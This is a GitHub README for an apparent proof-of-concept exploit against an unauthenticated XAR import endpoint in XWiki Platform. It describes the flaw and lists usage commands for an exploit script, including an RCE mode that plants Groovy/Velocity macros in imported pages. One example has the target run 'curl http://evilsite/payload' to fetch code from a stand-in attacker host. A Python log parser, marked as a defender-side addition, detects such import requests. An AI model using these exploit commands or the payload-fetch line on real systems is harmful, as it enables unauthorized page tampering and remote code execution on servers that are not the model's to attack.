portbuster1337/CVE-2026-33137

GitHub: portbuster1337/CVE-2026-33137

Stars: 0 | Forks: 0

# CVE-2026-33137

**XWiki Platform - Unauthenticated XAR Import via REST `/wikis/{wikiName}`**

## Description

The `POST /wikis/{wikiName}` REST API endpoint in XWiki Platform executes a XAR (XWiki Archive) import **without performing any authentication or authorization checks**. An unauthenticated attacker can create or update arbitrary documents in the target wiki by sending a crafted XAR file.

- **CVE**: CVE-2026-33137
- **CWE**: CWE-862 Missing Authorization
- **CVSS 4.0**: 9.3 (Critical) - `AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N`
- **Published**: 2026-05-20

## Affected Versions

| Status | Versions |
|--------|----------|
| Vulnerable | > 15.10.16, > 16.4.6, > 16.10.2 |
| Patched | 16.10.17, 17.4.9, 17.10.3, 18.0.1, 18.1.0-rc-1 |

## Impact

An unauthenticated attacker can:

- Create arbitrary wiki pages with arbitrary content
- Overwrite existing wiki pages
- Potentially achieve RCE by creating pages with malicious Velocity/Groovy scripts (if scripting is enabled)

## Details

The REST endpoint `POST /xwiki/rest/wikis/{wikiName}` accepts a XAR file in the request body and imports it directly into the wiki without checking if the requester has ADMIN rights. The fix (commit `4b7b95b`) adds an authorization check using `ContextualAuthorizationManager.checkAccess(Right.ADMIN, ...)`.
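As an added defender-side example (not part of this repository's PoC), the following Python check picks XAR import requests, a POST to exactly `/rest/wikis/{wikiName}`, out of reverse-proxy access logs in Combined Log Format, so the endpoint can be watched on an instance that has not yet moved to a patched version. The log lines, addresses and user agents are constructed, and the log format and the optional `/xwiki` context path are assumptions.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Combined Log Format (Apache/nginx default). The third field is the HTTP-auth
# user, which XWiki's cookie/form login leaves as "-" even for logged-in users.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)
# Only a POST to exactly .../rest/wikis/{wikiName} reaches the XAR import resource;
# deeper paths (/spaces/..., /pages/...) are the ordinary document API.
IMPORT_RE = re.compile(r'^/(?:[^/]+/)?rest/wikis/(?P<wiki>[^/?]+)/?(?:\?.*)?$')

@dataclass(frozen=True)
class ImportEvent:
    ip: str
    ts: str
    wiki: str
    status: int
    ua: str

def match_xar_import(line: str) -> Optional[ImportEvent]:
    """Return an ImportEvent if the line is a POST to the XAR import endpoint."""
    m = LOG_RE.match(line)
    if not m or m.group('method') != 'POST':
        return None
    p = IMPORT_RE.match(m.group('path'))
    if not p:
        return None
    return ImportEvent(m.group('ip'), m.group('ts'), p.group('wiki'),
                       int(m.group('status')), m.group('ua') or '')

def find_xar_imports(lines: Iterable[str]) -> List[ImportEvent]:
    return [e for e in (match_xar_import(l) for l in lines) if e]

# Constructed sample log lines (not taken from any real system).
SAMPLE_LOG = """\
198.51.100.4 - - [21/May/2026:10:13:58 +0000] "GET /xwiki/rest/wikis/xwiki HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [21/May/2026:10:14:01 +0000] "PUT /xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome HTTP/1.1" 202 900 "-" "Mozilla/5.0"
203.0.113.7 - - [21/May/2026:10:14:03 +0000] "POST /xwiki/rest/wikis/xwiki HTTP/1.1" 200 1287 "-" "python-requests/2.32.3"
203.0.113.7 - - [21/May/2026:10:14:05 +0000] "GET /xwiki/rest/wikis/xwiki/spaces/MySpace/pages/MyPage HTTP/1.1" 200 640 "-" "python-requests/2.32.3"
203.0.113.9 - - [22/May/2026:08:00:10 +0000] "POST /xwiki/rest/wikis/xwiki HTTP/1.1" 401 0 "-" "curl/8.5.0"
""".splitlines()

if __name__ == '__main__':
    for ev in find_xar_imports(SAMPLE_LOG):
        verdict = 'IMPORT ACCEPTED' if ev.status < 300 else 'import rejected'
        print(f"{ev.ts} {ev.ip} wiki={ev.wiki} status={ev.status} {verdict} ua={ev.ua}")
```

Because the access-log user field does not reflect XWiki's form login, every POST to the import resource is reported rather than only guest ones; a 2xx from a client that never authenticated through `/bin/login` is the case to follow up.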
## PoC Usage

```bash
# Install requirements
pip install requests

# Basic usage
python poc.py -t http://target:8080

# Specify wiki, space, and page names
python poc.py -t http://target:8080 -w xwiki -s MySpace -p MyPage

# Probe the target first
python poc.py -t http://target:8080 --probe

# Use a proxy (e.g., Burp Suite)
python poc.py -t http://target:8080 --proxy http://127.0.0.1:8080

# Custom content
python poc.py -t http://target:8080 -c "Proof of Concept"

# RCE mode: execute a command on the target server
python poc.py -t http://target:8080 --rce "id"

# RCE with authenticated triggering (if credentials are available)
python poc.py -t http://target:8080 --rce "curl http://evilsite/payload" -u admin --password pass
```

## RCE Mode (`--rce`)

1. Runs a pre-flight check (version detection, vulnerability status, XAR endpoint test, trigger path accessibility)
2. Imports pages with the user-specified command embedded in `{{groovy}}` and `{{velocity}}` macros
3. Attempts rendering via REST API, web UI, and SSTI-style injection
4. Reports which trigger paths are accessible vs blocked

**Requirements for successful RCE:**

- The target must allow guest viewing of pages (or credentials provided via `-u` / `--password`)
- Scripting/programming rights must be enabled for the viewing user
- Trigger paths must not be blocked by authentication redirects

## How the Exploit Works

1. A minimal XAR (ZIP) file is constructed containing:
   - `package.xml` - package descriptor
   - `{Space}/{Page}.xml` - document XML with content
2. The XAR bytes are POSTed to the vulnerable endpoint
3. If vulnerable, the document is created without authentication
4. Optionally verifies by reading back the document metadata

## Disclaimer

This PoC is provided for educational and authorized security testing purposes only. Unauthorized use of this exploit against systems you do not own or have explicit permission to test is illegal. The author is not responsible for any misuse or damage caused by this software.
## References

- [GitHub Security Advisory GHSA-qrvh-r3f2-9h4r](https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-qrvh-r3f2-9h4r)
- [Commit 4b7b95b (fix)](https://github.com/xwiki/xwiki-platform/commit/4b7b95b79256374d487e9ece1dc48f527966990f)
- [JIRA XWIKI-23953](https://jira.xwiki.org/browse/XWIKI-23953)
- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2026-33137)